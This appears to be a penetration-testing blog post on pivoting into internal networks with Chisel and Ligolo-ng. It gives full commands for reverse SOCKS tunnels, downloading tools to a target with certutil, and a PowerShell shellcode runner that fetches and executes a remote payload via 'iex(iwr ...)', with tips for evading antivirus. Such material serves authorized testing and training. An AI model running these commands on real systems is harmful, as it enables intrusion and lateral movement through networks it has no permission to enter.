Post

Port Forwarding and Pivoting with Chisel and Ligolo-ng (Linux + Windows)

Port Forwarding and Pivoting with Chisel and Ligolo-ng (Linux + Windows)

Port Forwarding and Pivoting with Chisel and Ligolo-ng

Disclaimer

This post is for authorized security testing and lab environments only.
Only use these techniques on systems you own or have explicit permission to assess.


Why Port Forwarding Matters in Pivoting

Port forwarding and tunneling allow you to reach internal networks that are not directly accessible from your attacker machine.

Two commonly used tools:

Chisel Fast, simple TCP tunneling and SOCKS pivoting. Excellent for quick pivots and proxychains workflows.

Ligolo-ng A network-native pivot using a TUN interface, allowing you to route traffic as if directly connected to the internal subnet.

Notes on IP Addresses and When Pivoting Is Needed

All IP addresses in this post are examples.

  • Addresses like 192.168.1.1 are commonly used as example “attacker reachable” IPs (lab VPN, public VPS, or your Kali interface reachable by the target).
  • After initial access, you often discover additional internal-only networks, for example 172.16.0.0/12, 10.0.0.0/8, or another 192.168.0.0/16 segment.

A common real-world pattern:

  • You gain initial access on a host reachable from your Kali or C2.
  • That host has a second interface on an internal subnet (for example 172.16.1.0/24).
  • Your Kali cannot directly reach that internal subnet.
  • You set up a tunnel (Chisel or Ligolo-ng) through the compromised host to reach 172.16.1.0/24 and any deeper segments.

Example:

  • Kali or C2 reachable IP: 192.168.1.1 (example)
  • Pivot host internal interface: 172.16.1.10
  • Internal subnet to enumerate: 172.16.1.0/24

Pivoting is what bridges that gap.

Kali (192.168.1.1) │ ▼ Compromised Host (172.16.1.10) │ ▼ Internal Network (172.16.1.0/24)


Part 1 – Chisel Pivoting (Reverse SOCKS Tunnel)

Kali Setup (Server)

1
./chisel server -p 8000 --reverse --socks5

Verify listening:

1
ss -lntp | grep 8000

Linux Target (Client)

1
./chisel client 192.168.1.1:8000 R:1080:socks &

Configure proxychains:

1
socks5 127.0.0.1 1080

Example usage:

1
proxychains nmap -sT -Pn 10.10.10.0/24

Windows Target (Client)

Transfer:

1
certutil -urlcache -split -f http://192.168.1.1/chisel.exe chisel.exe

Host from Kali:

1
python3 -m http.server 80

Run client:

1
.\chisel.exe client 192.168.1.1:8000 R:1080:socks

Part 2 – Ligolo-ng Pivoting (TUN Based Routing)

Build Ligolo-ng

1
2
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go

Windows build:

1
2
GOOS=windows go build -o agent.exe cmd/agent/main.go
GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Kali Setup (Proxy + TUN)

1
2
3
sudo ip tuntap add user <your_username> mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert

Target Setup (Agent)

1
./agent -connect <kali_ip>:11601 -ignore-cert

Route Internal Subnet

1
sudo ip route add 10.1.2.0/24 dev ligolo

Start tunnel inside Ligolo:

1
start

Pro-Tip: If you are pivoting into a Windows environment and can’t ping targets, remember that Windows Firewall often drops ICMP by default. Even if the host looks “down” via ping, try a TCP port check (e.g., nc -zv 10.1.2.x 445) to confirm the tunnel is active.


Part 3 – Running Ligolo Agent via PowerShell (Shellcode Runner)

Reference: OSEP Playground Tunneling Reference


A. Convert agent.exe to Shellcode

1
donut -f 1 -o agent.bin -a 2 -p "-connect your-server:11601 -ignore-cert" -i agent.exe

-a 2 indicates x64 architecture.


B. Confirm 64-bit Process

PowerShell:

1
[Environment]::Is64BitProcess

CMD:

set p

Should display:

1
PROCESSOR_ARCHITECTURE=AMD64

C. Use ligolo.ps1 Runner

Update inside ligolo.ps1:

1
$url = "http://192.168.1.1/agent.bin"

Serve files from Kali:

1
python3 -m http.server 80

Execute from target:

1
iex(iwr http://192.168.1.1/ligolo.ps1 -UseBasicParsing)

If detected by AV, consider using ligolo-psrunner.ps1 alternative.


Cleanup

Remove Ligolo Interface

1
2
sudo ip link set ligolo down
sudo ip link delete ligolo

Stop Chisel

1
2
ps aux | grep chisel
kill -9 <pid>

Tool Comparison Table

FeatureChiselLigolo-ng
Traffic TypeTCP (via SOCKS proxy)Full Network Stack (ICMP / UDP / TCP)
Ease of UseHigh (No sudo/admin required)Medium (Requires TUN + root on Kali)
PerformanceGoodExcellent (Native routing feel)
Nmap SupportRequires proxychains + -sTWorks natively (e.g., nmap 10.1.2.1)

Credits


Final Note

Always document:

  • Entry point
  • Pivot host
  • Internal subnet
  • Tool used and why
  • Port mappings and listeners

Clear documentation improves reproducibility and reporting quality.

This post is licensed under CC BY 4.0 by the author.